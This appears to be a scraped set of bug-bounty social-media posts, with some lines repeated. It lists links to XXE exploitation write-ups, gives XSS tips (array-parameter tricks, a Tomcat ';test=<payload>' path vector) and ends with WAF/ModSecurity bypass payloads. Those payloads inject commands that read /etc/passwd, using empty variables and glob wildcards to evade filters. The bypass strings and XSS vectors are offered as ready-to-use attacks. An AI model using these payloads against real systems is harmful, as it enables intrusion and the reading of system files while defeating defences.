#XXE
https://spaceraccoon.dev/a-tale-of-two-formats-exploiting-insecure-xml-and-zip-file-parsers-to-create-a
https://0xatul.github.io/posts/2020/02/external-xml-entity-via-file-upload-svg/
https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access
https://corben.io/XSS-to-XXE-in-Prince/
https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
https://medium.com/@mrnikhilsri/oob-xxe-in-prizmdoc-cve-2018-15805-dfb1e474345c
https://blog.netspi.com/xxe-in-ibms-maas360-platform
https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study
#bugbountytips,#bugbounty
https://spaceraccoon.dev/a-tale-of-two-formats-exploiting-insecure-xml-and-zip-file-parsers-to-create-a
https://0xatul.github.io/posts/2020/02/external-xml-entity-via-file-upload-svg/
https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access
https://corben.io/XSS-to-XXE-in-Prince/
https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
https://medium.com/@mrnikhilsri/oob-xxe-in-prizmdoc-cve-2018-15805-dfb1e474345c
https://blog.netspi.com/xxe-in-ibms-maas360-platform
https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study
#bugbountytips,#bugbounty
spaceraccoon.dev
A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell
While researching a bug bounty target, I came across a web application that processed a custom file type which was actually just a ZIP file that contains an XML that functions as a manifest. If handled naively, this packaging pattern creates additional security…
Alway convert parameter to array you will get unexpected result, some times xss bypass
Like,
path=/abc to path["]=/abc
#bugbountytip
Like,
path=/abc to path["]=/abc
#bugbountytip
Use path parameters if server is Apache Tomcat & running jsp pages . Like
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?